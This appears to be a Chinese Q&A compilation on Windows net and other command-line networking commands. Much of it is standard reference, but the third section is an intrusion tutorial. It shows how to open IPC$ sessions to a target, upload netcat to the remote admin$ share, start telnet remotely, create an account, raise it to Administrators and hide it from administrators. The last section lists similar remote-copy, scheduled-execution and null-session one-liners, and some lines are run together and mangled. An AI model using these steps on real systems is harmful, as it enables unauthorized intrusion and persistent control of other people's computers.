⑴ 有誰知道DOS命令提示符狀態下怎樣使用net send在區域網內發送消息
分類: 電腦/網路 >> 反病毒
解析:
Net Send
作 用:向網路的其他用戶、計算機或通信名發送消息。
命令格式:Net send {name | * | /domain[:name] | /users} message
有關參數說明:
·name要接收發送消息的用戶名、計算機名或通信名
·* 將消息發送到組中所有名稱
·/domain[:name]將消息發送到計算機域中的所有名稱
·/users將消息發送到與伺服器連接的所有用戶
·message作為消息發送的文本
例如:Net send /users server will shutdown in 10 minutes.給所有連接到伺服器的用戶發送消息。
⑵ DOS裡面的net命令有哪些其他功能
A:NET VIEW
作用:顯示域列表、計算機列表或指定計算機的共享資源列表。
命令格式:net view [\\computername | /domain[:domainname]]
參數介紹: (1)鍵入不帶參數的net view顯示當前域的計算機列表。
(2)\\computername 指定要查看其共享資源的計算機。
(3)/domain[:domainname]指定要查看其可用計算機的域。
簡單事例:(1)net view \\YFANG查看YFANG的共享資源列表。
(2)net view /domain:LOVE查看LOVE域中的機器列表。
B:NET USER
作用:添加或更改用戶帳號或顯示用戶帳號信息。該命令也可以寫為 net users。
命令格式:net user [username [password | *] [options]] [/domain]
參數介紹:(1)鍵入不帶參數的net user查看計算機上的用戶帳號列表。
(2)username添加、刪除、更改或查看用戶帳號名。
(3)password為用戶帳號分配或更改密碼。
(4)*提示輸入密碼。
(5)/domain在計算機主域的主域控制器中執行操作。
簡單事例:net user yfang查看用戶YFANG的信息
(C)NET USE
作用:連接計算機或斷開計算機與共享資源的連接,或顯示計算機的連接信息。
命令格式:net use [devicename | *] [\\computername\sharename[\volume]]
[password | *]] [/user:[domainname\]username] [[/delete] |
[/persistent:{yes | no}]]
參數介紹: (1) 鍵入不帶參數的net use列出網路連接。
(2) devicename指定要連接到的資源名稱或要斷開的設備名稱。
(3) \\computername\sharename伺服器及共享資源的名稱。
(4) password訪問共享資源的密碼。
(5) *提示鍵入密碼。
(6) /user指定進行連接的另外一個用戶。
(7) domainname指定另一個域。
(8) username指定登錄的用戶名。
(9) /home將用戶連接到其宿主目錄。
(10) /delete取消指定網路連接。
(11)/persistent控制永久網路連接的使用。
簡單事例: (1)net use e: \\YFANG\TEMP將\\YFANG\TEMP目錄建立為E盤
(2)net use e: \\YFANG\TEMP /delete斷開連接
(D)NET TIME
作用:使計算機的時鍾與另一台計算機或域的時間同步。
命令格式:net time [\\computername | /domain[:name]] [/set]
參數介紹:(1)\\computername要檢查或同步的伺服器名。
(2)/domain[:name]指定要與其時間同步的域。
(3)/set使本計算機時鍾與指定計算機或域的時鍾同步。
(E)Net Start
作用:啟動服務,或顯示已啟動服務的列表。
命令格式:net start service
(F)Net Pause
作用:暫停正在運行的服務。
命令格式:net pause service
(G)Net Continue
作用:重新激活掛起的服務。
命令格式:net continue service
(H)NET STOP
作用:停止 Windows NT 網路服務。
命令格式:net stop service
參數介紹: (1)alerter(警報)
(2)client service for netware(Netware 客戶端服務)
(3)clipbook server(剪貼簿伺服器)
(4)computer browser(計算機瀏覽器)
(5)directory replicator(目錄復制器)
(6)ftp publishing service (ftp )(ftp 發行服務)
(7)lpdsvc
(8)net logon(網路登錄)
(9)network dde(網路 dde)
(10)network dde dsdm(網路 dde dsdm)
(11)network monitor agent(網路監控代理)
(12)nt lm security support provider(NT LM 安全性支持提供)
(13)ole(對象鏈接與嵌入)
(14)remote access connection manager(遠程訪問連接管理器)
(15)remote access isnsap service(遠程訪問 isnsap 服務)
(16)remote access server(遠程訪問伺服器)
(17)remote procere call (rpc) locator(遠程過程調用定位器)
(18)remote procere call (rpc) service(遠程過程調用服務)
(19)schele(調度)
(20)server(伺服器)
(21)simple tcp/ip services(簡單 TCP/IP 服務)
(22)snmp
(23)spooler(後台列印程序)
(24)tcp/ip netbios helper(TCP/IP NETBIOS 輔助工具)
(25)ups
(26)workstation(工作站)
(27)messenger(信使)
(28)dhcp client
(29)eventlog
以下這些SERVICE只能在NT SERVER上使用 (1)file server for macintosh
(2)gateway service for netware
(3)microsoft dhcp server
(4)print server for macintosh
(5)remoteboot
(6)windows internet name service
(I) Net Statistics
作用:顯示本地工作站或伺服器服務的統計記錄。
命令格式:net statistics [workstation | server]
參數介紹:(1)鍵入不帶參數的net statistics列出其統計信息可用的運行服務。
(2)workstation顯示本地工作站服務的統計信息。
(3)server顯示本地伺服器服務的統計信息。
簡單事例:net statistics server | more顯示伺服器服務的統計信息
(J) Net Share
作用:創建、刪除或顯示共享資源。
命令格式:net share sharename=drive:path [/users:number | /unlimited]
[/remark:"text"]
參數介紹:(1)鍵入不帶參數的net share顯示本地計算機上所有共享資源的信息。
(2)sharename是共享資源的網路名稱。
(3)drive:path指定共享目錄的絕對路徑。
(4)/users:number設置可同時訪問共享資源的最大用戶數。
(5)/unlimited不限制同時訪問共享資源的用戶數。
(6/remark:"text "添加關於資源的注釋,注釋文字用引號引住。
簡單事例:(1) net share mylove=c:\temp /remark:"my first share"以mylove為共享名共
享C:\temp
(2)net share mylove /delete停止共享mylove目錄
(K) Net Session
作用:列出或斷開本地計算機和與之連接的客戶端的會話,也可以寫為net sessions或net
sess。
命令格式:net session [\\computername] [/delete]
參數介紹:(1)鍵入不帶參數的net session顯示所有與本地計算機的會話的信息。
(2)\\computername標識要列出或斷開會話的計算機。
(3)/delete結束與\\computername計算機會話並關閉本次會話.
簡單事例:net session \\YFANG要顯示計算機名為YFANG的客戶端會話信息列表。
(L) Net Send
作用:向網路的其他用戶、計算機或通信名發送消息。
命令格式:net send {name | * | /domain[:name] | /users} message
參數介紹:(1)name要接收發送消息的用戶名、計算機名或通信名。
(2)*將消息發送到組中所有名稱。
(3)/domain[:name]將消息發送到計算機域中的所有名稱。
(4)/users將消息發送到與伺服器連接的所有用戶。
(5)message作為消息發送的文本。
簡單事例:net send /users server will shutdown in 5 minutes.給所有連接到伺服器
的用戶發送消息
(M) Net Print
作用:顯示或控制列印作業及列印隊列。
命令格式:net print [\\computername ] job# [/hold | /release | /delete]
參數介紹:(1)computername共享列印機隊列的計算機名。
(2)sharename列印隊列名稱。
(3)job#在列印機隊列中分配給列印作業的標識號。
(4)/hold使用 job# 時,在列印機隊列中使列印作業等待。
(5)/release釋放保留的列印作業。
(6/delete從列印機隊列中刪除列印作業。
簡單事例:net print \\YFANG\SEEME列出\\YFANG計算機上SEEME列印機隊列的目錄
(N)Net Name
作用:添加或刪除消息名(有時也稱別名),或顯示計算機接收消息的名稱列表。
命令格式:net name [name [/add | /delete]]
參數介紹:(1)鍵入不帶參數的net name列出當前使用的名稱。
(2)name指定接收消息的名稱。
(3)/add將名稱添加到計算機中。
(4)/delete從計算機中刪除名稱。
(O) Net Localgroup
作用:添加、顯示或更改本地組。
命令格式:net localgroup groupname {/add [/comment:"text "] | /delete}
[/domain]
參數介紹:(1)鍵入不帶參數的net localgroup顯示伺服器名稱和計算機的本地組名稱。
(2)groupname要添加、擴充或刪除的本地組名稱。
(3)/comment: "text "為新建或現有組添加註釋。
(4)/domain在當前域的主域控制器中執行操作,否則僅在本地計算機上執行操作?
(5)name [ ...]列出要添加到本地組或從本地組中刪除的一個或多個用戶名或組
名。
(6)/add將全局組名或用戶名添加到本地組中。
(7)/delete從本地組中刪除組名或用戶名。
簡單事例:(1)net localgroup love /add將名為love的本地組添加到本地用戶帳號資料庫
(2)net localgroup love顯示love本地組中的用戶
(P) Net Group
作用:在 Windows NT Server 域中添加、顯示或更改全局組。
命令格式:net group groupname {/add [/comment:"text "] | /delete} [/domain]
參數介紹:(1)鍵入不帶參數的net group顯示伺服器名稱及伺服器的組名稱。
(2)groupname要添加、擴展或刪除的組。
(3)/comment:"text "為新建組或現有組添加註釋。
(4)/domain在當前域的主域控制器中執行該操作,否則在本地計算機上執行操作
(5)username[ ...]列表顯示要添加到組或從組中刪除的一個或多個用戶。
(6)/add添加組或在組中添加用戶名。
(7)/delete刪除組或從組中刪除用戶名。
簡單事例:net group love yfang1 yfang2 /add將現有用戶帳號yfang1和yfang2添加到本地
計算機的love組
(Q) Net File
作用:顯示某伺服器上所有打開的共享文件名及鎖定文件數。
命令格式:net file [id [/close]]
參數介紹:(1)鍵入不帶參數的net file獲得伺服器上打開文件的列表。
(2)id文件標識號。
(3)/close關閉打開的文件並釋放鎖定記錄。
(R) Net Config
作用:顯示當前運行的可配置服務,或顯示並更改某項服務的設置。
命令格式:net config [service [options]]
參數介紹:(1)鍵入不帶參數的net config顯示可配置服務的列表。
(2)service通過net config命令進行配置的服務(server或workstation)
(3)options服務的特定選項。
(S) Net Computer
作用:從域資料庫中添加或刪除計算機。
命令格式:net computer \\computername {/add | /del}
參數介紹:(1)\\computername指定要添加到域或從域中刪除的計算機。
(2)/add將指定計算機添加到域。
(3)/del將指定計算機從域中刪除。
簡單事例:(1)net computer \\cc /add將計算機 cc 添加到登錄域
(T)Net Accounts
作用:更新用戶帳號資料庫、更改密碼及所有帳號的登錄要求。
命令格式:net accounts [/forcelogoff:{minutes | no}] [/minpwlen:length]
[/maxpwage:{days | unlimited}] [/minpwage:days] [/uniquepw:number]
[/domain]
參數介紹:(1)鍵入不帶參數的net accounts顯示當前密碼設置、登錄時限及域信息。
(2)/forcelogoff:{minutes | no}設置當用戶帳號或有效登錄時間過期時
(3)/minpwlen:length設置用戶帳號密碼的最少字元數。
(4)/maxpwage:{days | unlimited}設置用戶帳號密碼有效的最大天數。
(5)/minpwage:days設置用戶必須保持原密碼的最小天數。
(6)/uniquepw:number要求用戶更改密碼時,必須在經過number次後才能重復使用
與之相同的密碼。
(7)/domain在當前域的主域控制器上執行該操作。
(8)/sync當用於主域控制器時,該命令使域中所有備份域控制器同步
簡單事例:net accounts /minpwlen:7將用戶帳號密碼的最少字元數設置為7
以上介紹的是NET命令在WINNT下的基本用法,下面再來介紹一下NET命令在WIN98下的基本用法
在WIN98中NET命令也有一些參數
其中有一些參數的名字和功能及簡單的使用方法和WINNT下的相應的參數的用法相同的有:
(1)NET TIME命令
(2)NET PRINT命令
(3)NET USE命令
(4)NET VIEW命令
其中有一些參數的名字和WINNT下的相應的參數的名字相同但其用法卻有些不同的有:
(1)NET START
作用:啟動相應的服務。(不能在DOS-WIN中用)
命令格式:NET START [BASIC | NWREDIR | WORKSTATION | NETBIND | NETBEUI
| NWLINK] [/LIST] [/YES] [/VERBOSE]
(2)NET STOP
作用:停止相應的服務.(不能在DOS-WIN中用)
命令格式:NET STOP [BASIC | NWREDIR | WORKSTATION | NETBEUI | NWLINK] [/YES]
在WIN98中NET命令還有一些參數是在98下才有的,他們是:
(1)NET DIAG
作用:運行MS的DIAGNOSTICS程序顯示網路的DIAGNOSTIC信息
命令格式:NET DIAGNOSTICS [/NAMES | /STATUS]
(2)NET INIT
作用:不通過綁定來載入協議或網卡驅動(不能在DOS-WIN中用)
命令格式:NET INITIALIZE [/DYNAMIC]
(3)NET LOGOFF
作用:斷開連接的共享資源(不能在DOS-WIN中用)
(4)NET LOGON
作用:在WORKGROUP中登陸(不能在DOS-WIN中用)
命令格式:NET LOGON [user [password | ?]] [/DOMAIN:name] [/YES] [/SAVEPW:NO]
(5)NET PASSWORD
作用:更改你的網路登陸口令(不能在DOS-WIN中用)
命令格式:NET PASSWORD \\computer | /DOMAIN:name [user [oldpassword
[newpassword]]]
//////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////
Arp
顯示和修改「地址解析協議」(ARP) 所使用的到乙太網的 IP 或令牌環物理地址翻譯表。該命令只有在安裝了 TCP/IP 協議之後才可用。
arp -a [inet_addr] [-N [if_addr]
arp -d inet_addr [if_addr]
arp -s inet_addr ether_addr [if_addr]
參數
-a
通過詢問 TCP/IP 顯示當前 ARP 項。如果指定了 inet_addr,則只顯示指定計算機的 IP 和物理地址。
-g
與 -a 相同。
inet_addr
以加點的十進制標記指定 IP 地址。
-N
顯示由 if_addr 指定的網路界面 ARP 項。
if_addr
指定需要修改其地址轉換表介面的 IP 地址(如果有的話)。如果不存在,將使用第一個可適用的介面。
-d
刪除由 inet_addr 指定的項。
-s
在 ARP 緩存中添加項,將 IP 地址 inet_addr 和物理地址 ether_addr 關聯。物理地址由以連字元分隔的6 個十六進制位元組給定。使用帶點的十進制標記指定 IP 地址。項是永久性的,即在超時到期後項自動從緩存刪除。
ether_addr
指定物理地址。
Finger
在運行 Finger 服務的指定系統上顯示有關用戶的信息。根據遠程系統輸出不同的變數。該命令只有在安裝了 TCP/IP 協議之後才可用。
finger [-l] [user]@computer[...]
參數
-l
以長列表格式顯示信息。
user
指定要獲得相關信息的用戶。省略用戶參數以顯示指定計算機上所有用戶的信息:
@computer
Ftp
將文件傳送到正在運行 FTP 服務的遠程計算機或從正在運行 FTP 服務的遠程計算機傳送文件(有時稱作 daemon)。Ftp可以交互使用。單擊「相關主題」列表中的「ftp 命令」以獲得可用的「ftp」子命令描述。該命令只有在安裝了 TCP/IP 協議之後才可用。Ftp 是一種服務,一旦啟動,將創建在其中可以使用ftp 命令的子環境,通過鍵入 quit 子命令可以從子環境返回到 Windows 2000 命令提示符。當 ftp 子環境運行時,它由 ftp 命令提示符代表。
ftp [-v] [-n] [-i] [-d] [-g] [-s:filename] [-a] [-w:windowsize] [computer]
參數
-v
禁止顯示遠程伺服器響應。
-n
禁止自動登錄到初始連接。
-i
多個文件傳送時關閉交互提示。
-d
啟用調試、顯示在客戶端和伺服器之間傳遞的所有 ftp 命令。
-g
禁用文件名組,它允許在本地文件和路徑名中使用通配符字元(* 和 ?)。(請參閱聯機「命令參考」中的 glob 命令。)
-s: filename
指定包含 ftp 命令的文本文件;當 ftp 啟動後,這些命令將自動運行。該參數中不允許有空格。使用該開關而不是重定向(> )。
-a
在捆綁數據連接時使用任何本地介面。
-w:windowsize
替代默認大小為 4096 的傳送緩沖區。
computer
指定要連接到遠程計算機的計算機名或 IP 地址。如果指定,計算機必須是行的最後一個參數。
Nbtstat
該診斷命令使用 NBT(TCP/IP 上的 NetBIOS)顯示協議統計和當前 TCP/IP 連接。該命令只有在安裝了TCP/IP 協議之後才可用。
nbtstat [-a remotename] [-A IP address] [-c] [-n] [-R] [-r] [-S] [-s] [interval]
參數
-a remotename
使用遠程計算機的名稱列出其名稱表。
-A IP address
使用遠程計算機的 IP 地址並列出名稱表。
-c
給定每個名稱的 IP 地址並列出 NetBIOS 名稱緩存的內容。
-n
列出本地 NetBIOS 名稱。「已注冊」表明該名稱已被廣播 (Bnode) 或者 WINS(其他節點類型)注冊。
-R
清除 NetBIOS 名稱緩存中的所有名稱後,重新裝入 Lmhosts 文件。
-r
列出 Windows 網路名稱解析的名稱解析統計。在配置使用 WINS 的 Windows 2000 計算機上,此選項返回要通過廣播或WINS 來解析和注冊的名稱數。
-S
顯示客戶端和伺服器會話,只通過 IP 地址列出遠程計算機。
-s
顯示客戶端和伺服器會話。嘗試將遠程計算機 IP 地址轉換成使用主機文件的名稱。
interval
重新顯示選中的統計,在每個顯示之間暫停 interval 秒。按 CTRL+C 停止重新顯示統計信息。如果省略該參數,nbtstat 列印一次當前的配置信息。
Netstat
顯示協議統計和當前的 TCP/IP 網路連接。該命令只有在安裝了 TCP/IP 協議後才可以使用。
netstat [-a] [-e] [-n] [-s] [-p protocol] [-r] [interval]
參數
-a
顯示所有連接和偵聽埠。伺服器連接通常不顯示。
-e
顯示乙太網統計。該參數可以與 -s 選項結合使用。
-n
以數字格式顯示地址和埠號(而不是嘗試查找名稱)。
-s
顯示每個協議的統計。默認情況下,顯示 TCP、UDP、ICMP 和 IP 的統計。-p 選項可以用來指定默認的子集。
-p protocol
顯示由 protocol 指定的協議的連接;protocol 可以是 tcp 或 udp。如果與 -s 選項一同使用顯示每個協議的統計,protocol 可以是 tcp、udp、icmp 或 ip。
-r
顯示路由表的內容。
interval
重新顯示所選的統計,在每次顯示之間暫停 interval 秒。按 CTRL+B 停止重新顯示統計。如果省略該參數,netstat 將列印一次當前的配置信息。
Ping
驗證與遠程計算機的連接。該命令只有在安裝了 TCP/IP 協議後才可以使用。
ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [-j computer-list] | [-k computer-list] [-w timeout] destination-list
參數
-t
Ping 指定的計算機直到中斷。
-a
將地址解析為計算機名。
-n count
發送 count 指定的 ECHO 數據包數。默認值為 4。
-l length
發送包含由 length 指定的數據量的 ECHO 數據包。默認為 32 位元組;最大值是 65,527。
-f
在數據包中發送「不要分段」標志。數據包就不會被路由上的網關分段。
-i ttl
將「生存時間」欄位設置為 ttl 指定的值。
-v tos
將「服務類型」欄位設置為 tos 指定的值。
-r count
在「記錄路由」欄位中記錄傳出和返回數據包的路由。count 可以指定最少 1 台,最多 9 台計算機。
-s count
指定 count 指定的躍點數的時間戳。
-j computer-list
利用 computer-list 指定的計算機列表路由數據包。連續計算機可以被中間網關分隔(路由稀疏源)IP 允許的最大數量為9。
-k computer-list
利用 computer-list 指定的計算機列表路由數據包。連續計算機不能被中間網關分隔(路由嚴格源)IP 允許的最大數量為9。
-w timeout
指定超時間隔,單位為毫秒。
destination-list
指定要 ping 的遠程計算機。
Rcp
在 Windows 2000 計算機和運行遠程外殼埠監控程序 rshd 的系統之間復制文件。rcp 命令是一個連接命令,從Windows 2000 計算機發出該命令時,也可以用於其他傳輸在兩台運行 rshd 的計算機之間復制文件。rshd 埠監控程序可以在 UNIX 計算機上使用,而在Windows 2000 上不能使用,所以 Windows 2000 計算機僅可以作為發出命令的系統參與。遠程計算機必須也通過運行 rshd 提供 rcp 實用程序。
rcp [-a | -b] [-h] [-r] source1 source2 ... sourceN destination
參數
-a
指定 ASCII 傳輸模式。此模式在傳出文件上將回車/換行符轉換為回車符,在傳入文件中將換行符轉換為回車/換行符。該模式為默認的傳輸模式。
-b
指定二進制圖像傳輸模式。沒有執行回車/換行符轉換。
-h
傳輸 Windows 2000 計算機上標記為隱藏屬性的源文件。如果沒有該選項,在 rcp 命令行上指定隱藏文件的效果與文件不存在一樣。
-r
將源的所有子目錄內容遞歸復制到目標。source 和 destination 都必須是目錄,雖然即使源不是目錄,使用-r 也能夠工作。但將沒有遞歸。
source 和 destination
格式必須為 [computer[.user]:]filename。如果忽略了 [computer[.user]:] 部分,計算機將假定為本地計算機。如果省略了 [.user] 部分,將使用當前登錄的 Windows 2000 用戶名。如果使用了完全合格的計算機名,其中包含句點(.) 分隔符,則必須包含 [.user]。否則,計算機名的最後部分將解釋為用戶名。如果指定了多個源文件,則destination 必須是目錄。
如果文件名不是以 UNIX 的正斜杠 (/) 或 Windows 2000 系統的反斜杠 (\) 打頭,則假定相對於當前的工作目錄。在Windows 2000 中,這是發出命令的目錄。在遠程系統中,這是遠程用戶的登錄目錄。句點 (.) 表示當前的目錄。在遠程路徑中使用轉義字元(\、" 或 '),以便在遠程計算機中使用通配符。
Rexec
在運行 REXEC 服務的遠程計算機上運行命令。rexec 命令在執行指定命令前,驗證遠程計算機上的用戶名,只有安裝了TCP/IP 協議後才可以使用該命令。
rexec computer [-l username] [-n] command
參數
computer
指定要運行 command 的遠程計算機。
-l username
指定遠程計算機上的用戶名。
-n
將 rexec 的輸入重定向到 NULL。
command
指定要運行的命令。
Route
控制網路路由表。該命令只有在安裝了 TCP/IP 協議後才可以使用。
route [-f] [-p] [command [destination] [mask subnetmask] [gateway] [metric costmetric]
參數
-f
清除所有網關入口的路由表。如果該參數與某個命令組合使用,路由表將在運行命令前清除。
-p
該參數與 add 命令一起使用時,將使路由在系統引導程序之間持久存在。默認情況下,系統重新啟動時不保留路由。與 print 命令一起使用時,顯示已注冊的持久路由列表。忽略其他所有總是影響相應持久路由的命令。
command
指定下列的一個命令。
命令 目的
print 列印路由
add 添加路由
delete 刪除路由
change 更改現存路由
destination
指定發送 command 的計算機。
mask subnetmask
指定與該路由條目關聯的子網掩碼。如果沒有指定,將使用 255.255.255.255。
gateway
指定網關。
名為 Networks 的網路資料庫文件和名為 Hosts 的計算機名資料庫文件中均引用全部 destination 或 gateway 使用的符號名稱。如果命令是 print 或 delete,目標
⑶ 請教dos命令中的 net 詳細用法
net
這個命令是網路命令中最重要的一個,必須透徹掌握它的每一個子命令的用法,因為它的功能實在是太強大了,這簡直就是微軟為我們提供的最好的入侵工具。首先讓我們來看一看它都有那些子命令,鍵入net/?回車如圖6。
在這里,我們重點掌握幾個入侵常用的子命令。
netview
使用此命令查看遠程主機的所以共享資源。命令格式為netview\\IP。如圖7。
netuse
把遠程主機的某個共享資源影射為本地盤符,圖形界面方便使用,呵呵。命令格式為netusex:\\IP\sharename。上面一個表示把192.168.0.5IP的共享名為magic的目錄影射為本地的Z盤。下面表示和192.168.0.7建立IPC$連接(netuse\\IP\IPC$"password"/user:"name"),如圖8。
建立了IPC$連接後,呵呵,就可以上傳文件了:nc.exe\\192.168.0.7\admin$,表示把本地目錄下的nc.exe傳到遠程主機,結合後面要介紹到的其他DOS命令就可以實現入侵了。
netstart
使用它來啟動遠程主機上的服務。當你和遠程主機建立連接後,如果發現它的什麼服務沒有啟動,而你又想利用此服務怎麼辦?就使用這個命令來啟動吧。用法:netstartservername,如圖9,成功啟動了telnet服務。
netstop
入侵後發現遠程主機的某個服務礙手礙腳,怎麼辦?利用這個命令停掉就ok了,用法和netstart同。
netuser
查看和帳戶有關的情況,包括新建帳戶、刪除帳戶、查看特定帳戶、激活帳戶、帳戶禁用等。這對我們入侵是很有利的,最重要的,它為我們克隆帳戶提供了前提。鍵入不帶參數的netuser,可以查看所有用戶,包括已經禁用的。下面分別講解。
1,netuserabcd1234/add,新建一個用戶名為abcd,密碼為1234的帳戶,默認為user組成員。
2,netuserabcd/del,將用戶名為abcd的用戶刪除。
3,netuserabcd/active:no,將用戶名為abcd的用戶禁用。
4,netuserabcd/active:yes,激活用戶名為abcd的用戶。
5,netuserabcd,查看用戶名為abcd的用戶的情況,如圖10。
netlocalgroup
查看所有和用戶組有關的信息和進行相關操作。鍵入不帶參數的netlocalgroup即列出當前所有的用戶組。在入侵過程中,我們一般利用它來把某個帳戶提升為administrator組帳戶,這樣我們利用這個帳戶就可以控制整個遠程主機了。用法:/add,如圖11。
現在我們把剛才新建的用戶abcd加到administrator組里去了,這時候abcd用戶已經是超級管理員了,呵呵,你可以再使用netuserabcd來查看他的狀態,和圖10進行比較就可以看出來。但這樣太明顯了,網管一看用戶情況就能漏出破綻,所以這種方法只能對付菜鳥網管,但我們還得知道。現在的手段都是利用其他工具和手段克隆一個讓網管看不出來的超級管理員,這是後話。有興趣的朋友可以參照《黑客防線》第30期上的《由淺入深解析隆帳戶》一文。
nettime
這個命令可以查看遠程主機當前的時間。如果你的目標只是進入到遠程主機裡面,那麼也許就用不到這個命令了。但簡單的入侵成功了,難道只是看看嗎?我們需要進一步滲透。這就連遠程主機當前的時間都需要知道,因為利用時間和其他手段(後面會講到)可以實現某個命令和程序的定時啟動,為我們進一步入侵打好基礎。用法:nettime\\IP。
⑷ DOS基礎操作命令
windows系統中dos的基本操作 簡介 windows系統是現在人們使用最多的操作系統,在系統使用過程的時候有的時候需要使用到dos命令,掌握了DOS命令,將會玩轉windows系統環境!下面我為大家整理了DOS基礎操作命令大全,希望能幫到大家!
at 查看所有的計劃任務
at ip time 程序名(或一個命令) /r 在某時間運行對方某程序並重新啟動計算機attrib 文件名(目錄名) 查看某文件(目錄)的屬性attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔,只讀,系統,隱藏 屬性;用+則是添加為某屬性cacls 文件名 參數 顯示或修改文件訪問控制列表(ACL)——針對NTFS格式時。參數:/D 用戶名:設定拒絕某用戶訪問;/P 用戶名:perm 替換指定用戶的訪問許可權;/G 用戶名:perm 賦予指定用戶訪問許可權;Perm 可以是: N 無,R 讀取, W 寫入, C 更改(寫入),F 完全控制;例:cacls D: est.txt /D pub 設定d: est.txt拒絕pub用戶訪問。
cacls 文件名 查看文件的訪問用戶許可權列表
call 路徑批處理文件名 從批處理程序中調用另一個批處理程序 (更多說明見call /?)chkdsk /F D: 檢查磁碟D並顯示狀態報告;加參數/f並修復磁碟上的錯誤cmd 啟動一個win2K命令解釋窗口。參數:/eff、/en 關閉、開啟命令擴展;更我詳細說明見cmd /?
color 顏色值 設置cmd控制台前景和背景顏色;0=黑、1=藍、2=綠、3=淺綠、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍、A=淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白 路徑文件名1 路徑文件名2 /y 復制文件1到指定的目錄為文件2,用參數/y就同時取消確認你要改寫一份現存目錄文件 c:srv.exe ipadmin$ 復制本地c:srv.exe到對方的admin下cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件,註:2st.txt文件頭要空三排,參數:/b指二進制文件,/a指ASCLL格式文件 ipadmin$svv.exe c: 或:ipadmin$*.* 復制對方admini$共享下的srv.exe文件(所有文件)至本地C:
x 要復制的文件或目錄樹 目標地址目錄名 復制文件和目錄樹,用參數/Y將不提示覆蓋相同文件date /t 、 time /t 使用此參數即「DATE/T」、「TIME/T」將只顯示當前日期和時間,而不必輸入新日期和時間del -F 文件名 加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件,/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如「DEL/AR *.*」表示刪除當前目錄下所有隻讀文件,「DEL/A-S *.*」表示刪除當前目錄下除系統文件以外的所有文件del /S /Q 目錄 或用:rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除。(二個命令作用相同)dir 查看文件,參數:/Q顯示文件及目錄屬系統哪個用戶,/T:C顯示文件創建時間,/T:A顯示文件上次被訪問時間,/T:W上次被修改時間doskey 要鎖定的命令=字元
doskey 要解鎖命令= 為DOS提供的鎖定命令(編輯命令行,重新調用win2k命令,並創建宏)。如:鎖定dir命令:doskey dir=entsky (不能用doskey dir=dir);解鎖:doskey dir=echo on或off 打開或關閉echo,僅用echo不加參數則顯示當前echo設置echo 信息 在屏幕上顯示出信息
echo 信息 >> pass.txt 將」信息」保存到pass.txt文件中exit 退出cmd.exe程序或目前,用參數/B則是退出當前批處理腳本而不是cmd.exefc one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件中,」> 「和」> >」 是重定向命令find 文件名 查找某文件
findstr 「Hello」 aa.txt 在aa.txt文件中尋找字元串hellofinger username @host 查看最近有哪些用戶登陸for 對一組文件中的每一個文件執行某個特定命令(更多說明見for命令及變數)format 盤符 /FS:類型 格式化磁碟,類型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFSftp ip 埠 用於上傳文件至伺服器或進行文件操作,默認埠為21。bin指用二進制方式傳送(可執行文件進);默認為ASCII格式傳送(文本文件時)goto 標簽 將cmd.exe導向到批處理程序中帶標簽的行(標簽必須單獨一行,且以冒號打頭,例如:「:start」標簽)if 在批處理程序中執行條件處理(更多說明見if命令及變數)ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用參數「/all」顯示全部配置信息kill -F 進程名 加-F參數後強制結束某進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)md 目錄名 創建目錄
mem 查看cpu使用情況
more 文件名 逐屏顯示輸出文件
move 盤符路徑要移動的文件名 存放移動文件的路徑移動後文件名 移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋net use ipipc$ 」 」 /user:」 」 建立IPC空鏈接net use ipipc$ 「密碼」 /user:」用戶名」 建立IPC非空鏈接net use h: ipc$ 「密碼」 /user:」用戶名」 直接登陸後映射對方C:到本地為H:
net use h: ipc$ 登陸後映射對方C:到本地為H:
net use ipipc$ /del 刪除IPC鏈接
net use h: /del 刪除映射對方到本地的為H:的映射net user 用戶名 密碼 /add 建立用戶
net user guest /active:yes 激活guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net locaLGroup administrators 用戶名 /add 把「用戶」添加到管理員中使其具有管理員許可權,注意:administrator後加s用復數net start 查看開啟了哪些服務
net start 服務名 開啟服務;(如:net start telnet, net start schele)net stop 服務名 停止某服務
net time 目標ip 查看對方時間
net time 目標ip /set 設置本地計算機時間與「目標IP」主機的時間同步,加上參數/yes可取消確認信息net view 查看本地區域網內開啟了哪些共享
net view ip 查看對方區域網內開啟了哪些共享net config 顯示系統網路設置
net logoff 斷開連接的共享
net pause 服務名 暫停某服務
net send ip 「文本信息」 向對方發信息net ver 區域網內正在使用的網路連接類型和信息net share 查看本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del 刪除ipc$共享
net share c$ /del 刪除C:共享
net user guest 12345 用guest用戶登陸後用將密碼改為12345net password 密碼 更改系統登陸密碼
netstat -a 查看開啟了哪些埠,常用netstat -annetstat -n 查看埠的網路連接情況,常用netstat -annetstat -v 查看正在進行的工作
netstat -p 協議名 例:netstat -p tcq/ip 查看某協議使用情況(查看tcp/ip協議使用情況)netstat -s 查看正在使用的所有協議使用情況nBTstat -A ip 對方136到139其中一個埠開了的話,就可查看對方最近登陸的用戶名(03前的為用戶名)-注意:參數-A要大寫netsh 查看或更改本地網路配置情況
open ip 連接到IP(屬telnet登陸後的命令)
pause 暫停批處理程序,並顯示出:請按任意鍵繼續….
path 路徑可執行文件的文件名 為可執行文件設置一個路徑。
ping ip(或域名) 向對方主機發送默認大小為32位元組的數據,參數:「-l[空格]數據包大小」;「-n發送數據次數」;「-t」指一直ping。
